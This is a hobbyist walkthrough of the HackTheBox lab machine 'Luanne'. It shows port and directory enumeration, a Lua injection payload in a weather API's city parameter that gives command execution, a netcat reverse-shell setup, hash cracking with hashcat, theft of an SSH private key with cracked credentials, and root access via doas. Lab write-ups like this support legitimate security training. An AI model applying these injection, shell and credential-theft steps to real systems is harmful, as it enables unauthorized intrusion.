Luanne Hackthebox writeup.

Luanne.

Newly deployed machine named “Luanne”, in HackTheBox, was quite an easy and fantastic box.
Integrated with OpenBSD, it has got stuff linked to Lua and cracking hashes. So, let’s start.
Hoping you have done basic things such as connecting to VPN and setting up directories, we will begin
So, inception with a nmap scan
$ nmap –sC –sV –oA nmap/nmap.scan 10.10.10.218

This will brief us with some open ports with services running along with the version. So, we see port 22 is open with ssh. However, with that version, no luck on any interesting exploit. Also, we see port 80 open with http nginx web server running on top of it. Also, it discovered robots.txt file for us with a disallowed entry: /weather (probably a directory).
When we open the website, we are prompted with authentication form. I tried with some injections but it turned out to be a waste of time.

So, as of Nmap result, I was fascinated to robots.txt. I fired it up and saw it is disallowing us to access /weather directory. I searched for some way to bypass the blocking and it took me an hour to realize that I am a nincompoop.

After that, I ran gobuster to see if I can hunt anything inside /weather/ directory.
$ gobuster dir -u http://10.10.10.218/weather/ -w /opt/SecLists-master/Discovery/Web-content/raft-small￾directories.txt

To my surprise, I found a web file “forecast”. With no second wasted, I opened /weather/forecast and boom some json stuffs were running there.

Using some brain, I noticed that city= is a parameter. As mentioned there, I tried to supply parameter ?city=list. This is what I got

Then, one by one, I tried ?city=London, ?city=Manchester. Nothing interesting there. So, I inject ‘ in parameter [?city=’]. With this, I got an error in Raw Data tab which tells there’s got something running with lua in backend.

Ergo, I searched for something to exploit on lua. Interesting!! I got some ways to exploit.

So, I tried ?city=’); print(“Helloworld”) —

Notes

· ‘) will end the parameter.

· ; will generate new line.

· Print(“hello world”) will print hello world.

· — will comment out the rest of the codes.

So, I tried something to do RCE and luckily, there’s os.execute() with us that will execute system commands for us in lua. With that in my hand, I cat /etc/passwd file(probably everyone does that). Note that r.michaels is the user.

Then, I tried to execute nc to gain reverse shell. But surprisingly, It didn’t turn out to work. So, I searched for some cheat sheet with nc for reverse shell. I found this:

Then I encoded with URL encoder.

After this I opened nc listener.

$nc -lnvp 1234

Subsequently, I executed our payload.

>> 'os.execute("<encoded text here>")--

Voila I got the shell

After some directory traversing, I found a hidden file .htpassword

Seemingly, there’s a unix hash stored. Let’s crack it with hashcat.
$hashcat –m 500 –a 0 –o <output file> <hash-stored-file> <wordlist> — show

I tried to look if there’s any secret port running. Running netstat –an I saw following.

Port 3001 looks interesting to me so I tried to curl and It ended up returning a authentication error form.
So, I supplied the username webapi_user from .htpasswd and password we cracked.
$curl –u webapi_user:iamthebest http://localhost:3001/~r.michaels/
Note: ~ is a way to store folder in NetBSD

So, We can see `id_rsa`. I again curled to get id_rsa. Boom we got it.

I copied it into a file and ran it with 600 permission

$ssh -I id_rsa r.michaelse@10.10.10.218

Boom we got user

For root(privilege escalation)

For root, I checked some folders inside, I saw backups as my main view. Inside it there’s a encoded file.

Inside it, I found a encoded file I found an encoded zip file. So, I used netpgp (a BSD based decryption, encryption and verification tool)

$ netpgp –decrypt (file) — output=/tmp/devel.tar.gz

So, I unzipped and untarred (I guess that’s the word) the file

Then, I again checked what’s inside .htpasswd file. Again, a hash.

So, I cracked it again with hashcat.

Then, we can see littlebear is the password.
Then I tried to switch user to root. However, I need superuser privilege command or sudo (that’s what we call in linux). After an eternity of research, I found doas is sudo equivalent in BSD. So I used it.

Voila, we are root. Now, I can cat into root.txt.

Thank you for reading! Hope you liked it.